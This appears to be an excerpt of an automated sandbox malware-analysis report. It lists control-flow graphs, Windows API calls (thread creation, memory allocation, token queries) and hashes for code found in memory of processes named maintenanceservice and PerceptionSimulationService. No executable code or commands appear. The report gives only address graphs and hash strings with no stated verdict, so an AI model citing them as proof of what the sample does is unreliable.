                                                                                                                                                                                Function 01A55D22 Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 207 1a55d22-1a55d45 208 1a55cd4-1a55cea CreateThread CloseHandle 207->208 209 1a55d47 207->209 210 1a55cf0-1a55d4d 208->210 211 1a55d8b-1a55d92 208->211 209->208 214 1a55d94 210->214 211->214 215 1a55d9c 211->215 218 1a55cb3 214->218 219 1a55c2c-1a55c2f 214->219 217 1a55da5-1a55db6 call 1a552d0 215->217 230 1a55c30-1a55c39 217->230 231 1a55dbc 217->231 218->219 220 1a55cb9-1a55cbd 218->220 221 1a55d56-1a55d5b CreateThread 220->221 222 1a55cc3 220->222 228 1a55d1f-1a55d45 221->228 229 1a55c7e 221->229 222->221 225 1a55cc9 222->225 225->221 228->208 228->209 229->228 232 1a55c84-1a55dc8 call 1a55e60 call 1a55990 229->232 230->220 243 1a55bf7 230->243 233 1a55d7d-1a55d89 231->233 234 1a55dbe 231->234 250 1a55dcd 232->250 233->211 233->214 234->233 242 1a55d9b 234->242 242->215 243->220 245 1a55bfd-1a55c06 243->245 245->217 250->250
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000C.00000002.2140837874.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_12_2_1a50000_maintenanceservice.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread$CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 738052048-0
                                                                                                                                                                                • Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                • Instruction ID: c8759657fc1f406a0b65941908d7d6018b7b6bb4eb992aa06f4944161261cce7
                                                                                                                                                                                • Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                • Instruction Fuzzy Hash: CAF02433E2C94586EBEDD73C885933AA6E1E789230F580B5FDD57C90E0EA75810B8609
                                                                                                                                                                                Function 01A55D50 Relevance: 1.5, APIs: 1, Instructions: 8threadCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 251 1a55d50-1a55d5b CreateThread 252 1a55c78 251->252 253 1a55d1f-1a55d45 252->253 254 1a55c7e 252->254 258 1a55cd4-1a55cea CreateThread CloseHandle 253->258 259 1a55d47 253->259 254->253 255 1a55c84-1a55dc8 call 1a55e60 call 1a55990 254->255 278 1a55dcd 255->278 260 1a55cf0-1a55d4d 258->260 261 1a55d8b-1a55d92 258->261 259->258 265 1a55d94 260->265 261->265 266 1a55d9c 261->266 272 1a55cb3 265->272 273 1a55c2c-1a55c2f 265->273 271 1a55da5-1a55db6 call 1a552d0 266->271 283 1a55c30-1a55c39 271->283 284 1a55dbc 271->284 272->273 275 1a55cb9-1a55cbd 272->275 276 1a55d56-1a55d5b CreateThread 275->276 277 1a55cc3 275->277 276->252 277->276 280 1a55cc9 277->280 278->278 280->276 283->275 292 1a55bf7 283->292 285 1a55d7d-1a55d89 284->285 286 1a55dbe 284->286 285->261 285->265 286->285 291 1a55d9b 286->291 291->266 292->275 293 1a55bfd-1a55c06 292->293 293->271
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000C.00000002.2140837874.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_12_2_1a50000_maintenanceservice.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread$CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 738052048-0
                                                                                                                                                                                • Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                • Instruction ID: d82fb14dc2cdb8595e988988cf993f06758eb91000ffa0817a7f8289716d8c16
                                                                                                                                                                                • Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                • Instruction Fuzzy Hash: DAB01213C3DA8A5E4396E73D040813889906F46034B781FAD9F73078D3D820140E5320
                                                                                                                                                                                Function 01A55990 Relevance: 1.4, APIs: 1, Instructions: 103COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 295 1a55990-1a5599b 297 1a559a1 295->297 298 1a55a33-1a55a61 call 1a89b00 295->298 297->298 300 1a559a7-1a559ab 297->300 308 1a55ab4-1a55aba call 1a71080 298->308 309 1a55a63 298->309 304 1a559b1-1a559f3 call 1a82320 300->304 305 1a55a59 300->305 304->305 326 1a559f5-1a559fa 304->326 306 1a55a25-1a55a2d 305->306 307 1a55a5b 305->307 315 1a55a70-1a55a7b 306->315 316 1a55a2f 306->316 307->306 318 1a55a23 307->318 327 1a55a83-1a55a88 call 1a55df0 308->327 328 1a55a13 308->328 309->308 313 1a55a65 309->313 313->315 319 1a55a16-1a55a1e call 1a71470 315->319 320 1a55a7d 315->320 316->313 324 1a55a24 318->324 334 1a55a96-1a55ac2 319->334 320->319 325 1a55a7f-1a55a81 320->325 325->327 330 1a55a51-1a55a54 call 1a8233c 326->330 331 1a559fc 326->331 338 1a55a8d VirtualAlloc 327->338 328->327 333 1a55a15 328->333 330->305 331->330 336 1a559fe-1a55a02 331->336 333->319 334->324 339 1a55ac8 334->339 336->330 338->334 339->324 340 1a55ace 339->340 340->298
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000C.00000002.2140837874.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_12_2_1a50000_maintenanceservice.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wcscpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1284135714-0
                                                                                                                                                                                • Opcode ID: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                • Instruction ID: a4e36922f98de5dd63a95093a6ec74b624c63f10a96b8035c634565da29e6c33
                                                                                                                                                                                • Opcode Fuzzy Hash: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                • Instruction Fuzzy Hash: 91219971D2DB848FD7EB932C949C2752AB2FB95224F8D01D7DE86C7192D93849058242
                                                                                                                                                                                Function 01A58245 Relevance: 1.3, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 342 1a58245-1a58247 343 1a582d2-1a582d7 342->343 344 1a5824d-1a5824f 342->344 346 1a58306-1a58309 343->346 345 1a58251-1a58393 call 1a872f4 344->345 359 1a5827e 345->359 360 1a58399 345->360 347 1a5832e-1a58330 346->347 348 1a5830b-1a58311 CloseHandle 346->348 350 1a58332 347->350 351 1a582dd-1a582e3 347->351 348->347 350->351 353 1a58334 350->353 355 1a583a3-1a583a4 351->355 356 1a582e9 351->356 358 1a5f524-1a5f52e 353->358 361 1a583af 355->361 356->355 357 1a582ef 356->357 366 1a582f0-1a5831c 357->366 365 1a5f807 358->365 359->348 363 1a58284 359->363 360->359 364 1a5839f-1a583a1 360->364 361->345 362 1a583b5 361->362 362->345 367 1a583bb-1a583ca 362->367 363->347 368 1a5828e 363->368 364->355 369 1a5f80d 365->369 370 1a5f8df-1a5f8e0 365->370 384 1a581e5 366->384 385 1a58322 366->385 381 1a58277-1a5827a 367->381 382 1a583d0 367->382 369->370 373 1a5f813 369->373 375 1a615a5-1a615aa 370->375 379 1a5f78f 373->379 380 1a5f81b 373->380 377 1a615ae-1a615af 375->377 383 1a615b2-1a615b7 377->383 379->380 386 1a5f795 379->386 380->370 387 1a58241 381->387 388 1a5827c 381->388 382->381 389 1a583d6 382->389 390 1a615ba-1a615c1 383->390 391 1a582a3-1a582a5 384->391 392 1a581eb 384->392 385->384 393 1a58328-1a5832c 385->393 386->365 401 1a58376-1a5837b 387->401 388->359 388->387 394 1a615c7-1a615d2 390->394 395 1a61750-1a617a2 call 1a872f4 390->395 396 1a583f9 391->396 397 1a582ab 391->397 398 1a581f1 392->398 399 1a582b2-1a582bc 392->399 393->347 400 1a582c5-1a582c8 393->400 405 1a615d4-1a615d6 394->405 406 1a61620-1a61623 394->406 396->343 403 1a583ff 396->403 397->396 407 1a582b1 397->407 398->399 409 1a581f7 398->409 399->400 410 1a58357-1a5836f GetTokenInformation 399->410 400->396 408 1a582ce 400->408 401->366 402 1a58381 401->402 402->366 413 1a58387 402->413 403->358 415 1a61670-1a61684 405->415 416 1a615dc-1a615df 405->416 411 1a61625-1a61628 406->411 412 1a616a0-1a616b4 406->412 407->399 417 1a582d0 408->417 418 1a5828f-1a58303 call 1a872ec 408->418 409->368 410->401 411->390 419 1a6162a-1a61636 411->419 422 1a616b6-1a616b9 412->422 423 1a616f4-1a616f5 412->423 413->381 415->375 420 1a6168a-1a6168d 415->420 416->390 424 1a615e1-1a615f6 416->424 417->343 417->418 418->346 445 1a5834f-1a58355 418->445 425 1a616dc-1a616ec 419->425 426 1a61638-1a61640 419->426 427 1a61693-1a61697 420->427 428 1a6172f-1a61738 420->428 430 1a6173a-1a6173b 422->430 431 1a616bb 422->431 434 1a616fe-1a6170c 423->434 432 1a616d2-1a616d7 424->432 433 1a615fc-1a61600 424->433 425->394 440 1a616f2 425->440 435 1a61646-1a6165f 426->435 436 1a6170e-1a61727 426->436 438 1a616bf-1a616cd 427->438 437 1a6173f-1a61740 428->437 430->437 431->438 432->377 433->434 441 1a61606-1a61618 433->441 442 1a61744-1a61748 434->442 435->394 444 1a61665 435->444 436->394 443 1a6172d 436->443 437->442 440->395 441->383 443->395 444->395 447 1a58341 445->447 448 1a58212-1a5821a GetTokenInformation 445->448 447->448 450 1a58347 447->450 448->361 449 1a58220-1a58234 448->449 454 1a583d7-1a583dd 449->454 455 1a5823a 449->455 450->426 452 1a5834d 450->452 452->445 454->396 455->454 456 1a58240 455->456 457 1a6b32e-1a6b330 456->457 459 1a6b332-1a6b337 call 1a872f4 457->459 460 1a6b300-1a6b302 457->460 459->460 465 1a6b339 459->465 465->460 466 1a6b33b-1a6b33f 465->466 469 1a6b317 466->469 470 1a6b305-1a6b32d 466->470 469->470 473 1a6b2ff 469->473 470->457 473->460
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000C.00000002.2140837874.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_12_2_1a50000_maintenanceservice.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                • Opcode ID: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                                                • Instruction ID: f5acb362ab5b69f08f109d7f0b9bc8dec3bc4d0b01f4ef0e469ae612d177ddfe
                                                                                                                                                                                • Opcode Fuzzy Hash: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                                                • Instruction Fuzzy Hash: 76F0A47450EB518FDBEB871E905043A7FB0AF81250B4D00CAEC97CB127C6389C02C792
                                                                                                                                                                                Function 01A583E7 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 605 1a583e7-1a583e9 606 1a582c5-1a582c8 605->606 607 1a583ef 605->607 609 1a582ce 606->609 610 1a583f9 606->610 607->606 608 1a583f5-1a583f7 607->608 608->610 613 1a582d0 609->613 614 1a5828f-1a58303 call 1a872ec 609->614 611 1a582d2-1a582d7 610->611 612 1a583ff 610->612 616 1a58306-1a58309 611->616 618 1a5f524-1a5f52e 612->618 613->611 613->614 614->616 626 1a5834f-1a58355 614->626 619 1a5832e-1a58330 616->619 620 1a5830b-1a58311 CloseHandle 616->620 624 1a5f807 618->624 621 1a58332 619->621 622 1a582dd-1a582e3 619->622 620->619 621->622 625 1a58334 621->625 629 1a583a3-1a583a4 622->629 630 1a582e9 622->630 627 1a5f80d 624->627 628 1a5f8df-1a5f8e0 624->628 625->618 639 1a58341 626->639 640 1a58212-1a5821a GetTokenInformation 626->640 627->628 634 1a5f813 627->634 638 1a615a5-1a615aa 628->638 633 1a583af 629->633 630->629 631 1a582ef 630->631 641 1a582f0-1a5831c 631->641 636 1a583b5 633->636 637 1a58251-1a58256 call 1a872f4 633->637 645 1a5f78f 634->645 646 1a5f81b 634->646 636->637 642 1a583bb-1a583ca 636->642 649 1a5825b-1a58393 637->649 643 1a615ae-1a615af 638->643 639->640 647 1a58347 639->647 640->633 644 1a58220-1a58234 640->644 674 1a581e5 641->674 675 1a58322 641->675 671 1a58277-1a5827a 642->671 672 1a583d0 642->672 652 1a615b2-1a615b7 643->652 679 1a583d7-1a583dd 644->679 680 1a5823a 644->680 645->646 654 1a5f795 645->654 646->628 655 1a5834d 647->655 656 1a61638-1a61640 647->656 665 1a5827e 649->665 666 1a58399 649->666 660 1a615ba-1a615c1 652->660 654->624 655->626 658 1a61646-1a6165f 656->658 659 1a6170e-1a61727 656->659 661 1a615c7-1a615d2 658->661 663 1a61665 658->663 659->661 662 1a6172d 659->662 660->661 668 1a61750-1a617a2 call 1a872f4 660->668 677 1a615d4-1a615d6 661->677 678 1a61620-1a61623 661->678 662->668 663->668 665->620 670 1a58284 665->670 666->665 673 1a5839f-1a583a1 666->673 670->619 685 1a5828e 670->685 683 1a58241 671->683 684 1a5827c 671->684 672->671 686 1a583d6 672->686 673->629 687 1a582a3-1a582a5 674->687 688 1a581eb 674->688 675->674 689 1a58328-1a5832c 675->689 691 1a61670-1a61684 677->691 692 1a615dc-1a615df 677->692 681 1a61625-1a61628 678->681 682 1a616a0-1a616b4 678->682 679->610 680->679 693 1a58240 680->693 681->660 694 1a6162a-1a61636 681->694 696 1a616b6-1a616b9 682->696 697 1a616f4-1a616f5 682->697 704 1a58376-1a5837b 683->704 684->665 684->683 687->610 698 1a582ab 687->698 700 1a581f1 688->700 701 1a582b2-1a582bc 688->701 689->606 689->619 691->638 695 1a6168a-1a6168d 691->695 692->660 702 1a615e1-1a615f6 692->702 703 1a6b32e-1a6b330 693->703 694->656 705 1a616dc-1a616ec 694->705 709 1a61693-1a61697 695->709 710 1a6172f-1a61738 695->710 711 1a6173a-1a6173b 696->711 712 1a616bb 696->712 722 1a616fe-1a6170c 697->722 698->610 713 1a582b1 698->713 700->701 714 1a581f7 700->714 701->606 715 1a58357-1a5836f GetTokenInformation 701->715 716 1a616d2-1a616d7 702->716 717 1a615fc-1a61600 702->717 707 1a6b332-1a6b337 call 1a872f4 703->707 708 1a6b300-1a6b302 703->708 704->641 706 1a58381 704->706 705->661 721 1a616f2 705->721 706->641 718 1a58387 706->718 707->708 729 1a6b339 707->729 720 1a616bf-1a616cd 709->720 723 1a6173f-1a61740 710->723 711->723 712->720 713->701 714->685 715->704 716->643 717->722 724 1a61606-1a61618 717->724 718->671 721->668 726 1a61744-1a61748 722->726 723->726 724->652 729->708 730 1a6b33b-1a6b33f 729->730 733 1a6b317 730->733 734 1a6b305-1a6b32d 730->734 733->734 737 1a6b2ff 733->737 734->703 737->708
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000C.00000002.2140837874.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_12_2_1a50000_maintenanceservice.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                • Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                • Instruction ID: 1b1d5f4737b9f26ab5d2866cf82112501d3cad8559cb79864e691396c81ae86b
                                                                                                                                                                                • Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                • Instruction Fuzzy Hash: 48F0903450DA41EFDBF7871E844093E2FB0AB41290B5C0049DD66CB127D23CD802C752
                                                                                                                                                                                Function 01A58318 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 474 1a58318-1a5831c 475 1a581e5 474->475 476 1a58322 474->476 477 1a582a3-1a582a5 475->477 478 1a581eb 475->478 476->475 479 1a58328-1a5832c 476->479 480 1a583f9 477->480 481 1a582ab 477->481 482 1a581f1 478->482 483 1a582b2-1a582bc 478->483 484 1a582c5-1a582c8 479->484 485 1a5832e-1a58330 479->485 488 1a582d2-1a582d7 480->488 489 1a583ff 480->489 481->480 490 1a582b1 481->490 482->483 492 1a581f7 482->492 483->484 493 1a58357-1a5836f GetTokenInformation 483->493 484->480 491 1a582ce 484->491 486 1a58332 485->486 487 1a582dd-1a582e3 485->487 486->487 494 1a58334 486->494 499 1a583a3-1a583a4 487->499 500 1a582e9 487->500 498 1a58306-1a58309 488->498 502 1a5f524-1a5f52e 489->502 490->483 495 1a582d0 491->495 496 1a5828f-1a58303 call 1a872ec 491->496 497 1a5828e 492->497 503 1a58376-1a5837b 493->503 494->502 495->488 495->496 496->498 522 1a5834f-1a58355 496->522 498->485 506 1a5830b-1a58311 CloseHandle 498->506 505 1a583af 499->505 500->499 501 1a582ef 500->501 510 1a582f0-1a5831c 501->510 512 1a5f807 502->512 509 1a58381 503->509 503->510 507 1a583b5 505->507 508 1a58251-1a58393 call 1a872f4 505->508 506->485 507->508 513 1a583bb-1a583ca 507->513 532 1a5827e 508->532 535 1a58399 508->535 509->510 515 1a58387 509->515 510->475 510->476 517 1a5f80d 512->517 518 1a5f8df-1a5f8e0 512->518 523 1a58277-1a5827a 513->523 541 1a583d0 513->541 515->523 517->518 524 1a5f813 517->524 530 1a615a5-1a615aa 518->530 538 1a58341 522->538 539 1a58212-1a5821a GetTokenInformation 522->539 528 1a58241 523->528 529 1a5827c 523->529 536 1a5f78f 524->536 537 1a5f81b 524->537 528->503 529->528 529->532 534 1a615ae-1a615af 530->534 532->506 540 1a58284 532->540 542 1a615b2-1a615b7 534->542 535->532 544 1a5839f-1a583a1 535->544 536->537 545 1a5f795 536->545 537->518 538->539 546 1a58347 538->546 539->505 543 1a58220-1a58234 539->543 540->485 540->497 541->523 547 1a583d6 541->547 548 1a615ba-1a615c1 542->548 567 1a583d7-1a583dd 543->567 568 1a5823a 543->568 544->499 545->512 550 1a5834d 546->550 551 1a61638-1a61640 546->551 554 1a615c7-1a615d2 548->554 555 1a61750-1a617a2 call 1a872f4 548->555 550->522 552 1a61646-1a6165f 551->552 553 1a6170e-1a61727 551->553 552->554 557 1a61665 552->557 553->554 556 1a6172d 553->556 559 1a615d4-1a615d6 554->559 560 1a61620-1a61623 554->560 556->555 557->555 565 1a61670-1a61684 559->565 566 1a615dc-1a615df 559->566 562 1a61625-1a61628 560->562 563 1a616a0-1a616b4 560->563 562->548 569 1a6162a-1a61636 562->569 571 1a616b6-1a616b9 563->571 572 1a616f4-1a616f5 563->572 565->530 570 1a6168a-1a6168d 565->570 566->548 573 1a615e1-1a615f6 566->573 567->480 568->567 574 1a58240 568->574 569->551 575 1a616dc-1a616ec 569->575 576 1a61693-1a61697 570->576 577 1a6172f-1a61738 570->577 578 1a6173a-1a6173b 571->578 579 1a616bb 571->579 584 1a616fe-1a6170c 572->584 580 1a616d2-1a616d7 573->580 581 1a615fc-1a61600 573->581 582 1a6b32e-1a6b330 574->582 575->554 589 1a616f2 575->589 588 1a616bf-1a616cd 576->588 585 1a6173f-1a61740 577->585 578->585 579->588 580->534 581->584 590 1a61606-1a61618 581->590 586 1a6b332-1a6b337 call 1a872f4 582->586 587 1a6b300-1a6b302 582->587 591 1a61744-1a61748 584->591 585->591 586->587 596 1a6b339 586->596 589->555 590->542 596->587 597 1a6b33b-1a6b33f 596->597 600 1a6b317 597->600 601 1a6b305-1a6b32d 597->601 600->601 604 1a6b2ff 600->604 601->582 604->587
                                                                                                                                                                                APIs
                                                                                                                                                                                • CloseHandle.KERNELBASE ref: 01A5830B
                                                                                                                                                                                • GetTokenInformation.KERNELBASE ref: 01A58369
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000C.00000002.2140837874.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_12_2_1a50000_maintenanceservice.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandleInformationToken
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3954737543-0
                                                                                                                                                                                • Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                • Instruction ID: de0b61b8b4deefd0761306af99cbfcc6763de442f640ac933f78f0a3c4536380
                                                                                                                                                                                • Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                • Instruction Fuzzy Hash: D5F03A3451EB51EFABE78B1E944093A7FB0BF412A4B5C4449ED96CB123D63CD842CB92

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:5.3%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                Total number of Nodes:56
                                                                                                                                                                                Total number of Limit Nodes:3
                                                                                                                                                                                execution_graph 3862 b783e7 3865 b781e5 3862->3865 3863 b7830b CloseHandle 3863->3865 3864 b78212 GetTokenInformation 3864->3865 3865->3863 3865->3864 3866 b78357 GetTokenInformation 3865->3866 3867 b781f7 3865->3867 3866->3865 3908 b781e3 3912 b781e5 3908->3912 3909 b78357 GetTokenInformation 3909->3912 3910 b7830b CloseHandle 3910->3912 3911 b78212 GetTokenInformation 3911->3912 3912->3909 3912->3910 3912->3911 3913 b781f7 3912->3913 3919 b75d22 3920 b75cd4 CreateThread CloseHandle 3919->3920 3923 b75bbc 3919->3923 3920->3923 3921 b75c2c 3922 b75d56 CreateThread 3922->3923 3923->3920 3923->3921 3923->3922 3924 b75c84 3923->3924 3925 b75990 VirtualAlloc 3924->3925 3926 b75dcd 3925->3926 3926->3926 3868 b75d50 CreateThread 3869 b75bbc 3868->3869 3870 b75cd4 CreateThread CloseHandle 3869->3870 3871 b75c84 3869->3871 3872 b75c2c 3869->3872 3875 b75d56 CreateThread 3869->3875 3870->3869 3876 b75990 3871->3876 3874 b75dcd 3874->3874 3875->3869 3879 b75994 wcscpy 3876->3879 3877 b75a23 3877->3874 3878 b75a8d VirtualAlloc 3878->3879 3879->3877 3879->3878 3880 b75b8f 3891 b853f0 3880->3891 3882 b75baf 3896 b781c0 3882->3896 3884 b75c2c 3885 b75c84 3886 b75990 VirtualAlloc 3885->3886 3887 b75dcd 3886->3887 3887->3887 3888 b75d56 CreateThread 3889 b75bbc 3888->3889 3889->3884 3889->3885 3889->3888 3890 b75cd4 CreateThread CloseHandle 3889->3890 3890->3889 3892 b853f4 3891->3892 3893 b8545e VirtualAlloc 3892->3893 3895 b853f6 3892->3895 3894 b85460 3893->3894 3894->3892 3895->3882 3900 b781e5 3896->3900 3897 b78357 GetTokenInformation 3897->3900 3898 b7830b CloseHandle 3898->3900 3899 b78212 GetTokenInformation 3899->3900 3900->3889 3900->3897 3900->3898 3900->3899 3901 b781f7 3900->3901 3901->3889 3914 b758de 3915 b853f0 VirtualAlloc 3914->3915 3916 b758f9 3915->3916 3917 b781c0 3 API calls 3916->3917 3918 b75907 3917->3918

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 00B781C0 Relevance: 4.9, APIs: 3, Instructions: 375COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 0 b781c0-b781d8 1 b781e5 0->1 2 b783bf-b783ca 0->2 3 b782a3-b782a5 1->3 4 b781eb 1->4 16 b78277-b7827a 2->16 17 b783d0 2->17 7 b782ab 3->7 8 b783f9 3->8 5 b782b2-b782bc 4->5 6 b781f1 4->6 12 b78357-b7836f GetTokenInformation 5->12 13 b782c5-b782c8 5->13 6->5 10 b781f7-b7828e 6->10 7->8 11 b782b1 7->11 14 b782d2-b782d7 8->14 15 b783ff 8->15 11->5 31 b78376-b7837b 12->31 13->8 18 b782ce 13->18 20 b78306-b78309 14->20 23 b7f524-b7f52e 15->23 21 b78241 16->21 22 b7827c 16->22 17->16 24 b783d6 17->24 26 b782d0 18->26 27 b7828f-b78303 call ba72ec 18->27 28 b7832e-b78330 20->28 29 b7830b-b78311 CloseHandle 20->29 21->31 32 b78251-b78256 call ba72f4 21->32 22->21 30 b7827e 22->30 25 b7f807 23->25 35 b7f8df-b7f8e0 25->35 36 b7f80d 25->36 26->14 26->27 27->20 60 b7834f-b78355 27->60 40 b78332 28->40 41 b782dd-b782e3 28->41 29->28 30->29 37 b78284 30->37 38 b78381 31->38 39 b782f0-b7831c 31->39 43 b7825b-b78260 32->43 53 b815a5-b815aa 35->53 36->35 44 b7f813 36->44 37->28 38->39 47 b78387 38->47 39->1 61 b78322 39->61 40->41 49 b78334 40->49 45 b783a3-b783a4 41->45 46 b782e9 41->46 51 b78390-b78393 43->51 56 b7f78f 44->56 57 b7f81b 44->57 45->23 46->45 54 b782ef 46->54 47->16 47->51 49->23 51->30 58 b78399 51->58 59 b815ae-b815af 53->59 54->39 56->57 62 b7f795 56->62 57->35 58->30 64 b7839f-b783a1 58->64 65 b815b2-b815b7 59->65 67 b78212-b7821a GetTokenInformation 60->67 68 b78341 60->68 61->1 66 b78328-b7832c 61->66 62->25 64->45 69 b815ba-b815c1 65->69 66->13 66->28 71 b78220-b78234 67->71 72 b783af 67->72 68->67 70 b78347 68->70 73 b81750-b817a2 call ba72f4 69->73 74 b815c7-b815d2 69->74 76 b81638-b81640 70->76 77 b7834d 70->77 98 b783d7-b783dd 71->98 99 b7823a 71->99 72->32 75 b783b5 72->75 80 b81620-b81623 74->80 81 b815d4-b815d6 74->81 75->32 86 b783bb-b783bd 75->86 87 b8170e-b81727 76->87 88 b81646-b8165f 76->88 77->60 84 b816a0-b816b4 80->84 85 b81625-b81628 80->85 82 b815dc-b815df 81->82 83 b81670-b81684 81->83 82->69 91 b815e1-b815f6 82->91 83->53 95 b8168a-b8168d 83->95 96 b816f4-b816f5 84->96 97 b816b6-b816b9 84->97 85->69 92 b8162a-b81636 85->92 86->2 87->74 93 b8172d 87->93 88->74 94 b81665 88->94 100 b815fc-b81600 91->100 101 b816d2-b816d7 91->101 92->76 102 b816dc-b816ec 92->102 93->73 94->73 103 b8172f-b81738 95->103 104 b81693-b81697 95->104 109 b816fe-b8170c 96->109 105 b8173a-b8173b 97->105 106 b816bb 97->106 98->8 99->98 108 b78240 99->108 100->109 110 b81606-b81618 100->110 101->59 102->74 111 b816f2 102->111 112 b8173f-b81740 103->112 107 b816bf-b816cd 104->107 105->112 106->107 113 b8b32e-b8b330 108->113 115 b81744-b81748 109->115 110->65 111->73 112->115 116 b8b300 113->116 117 b8b332-b8b337 call ba72f4 113->117 120 b8b2fd 116->120 121 b8b302 116->121 117->116 125 b8b339 117->125 123 b8b2ff 120->123 124 b8b305 120->124 126 b8b308-b8b315 123->126 124->126 127 b8b322-b8b32d 124->127 125->116 128 b8b33b-b8b33f 125->128 126->124 130 b8b317 126->130 127->113 128->126 130->120
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.3350267899.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_b70000_PerceptionSimulationService.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8df0ac1401ce2cdb2d999bdf71bb41ab150bf242135a1906e3b3b3c900401258
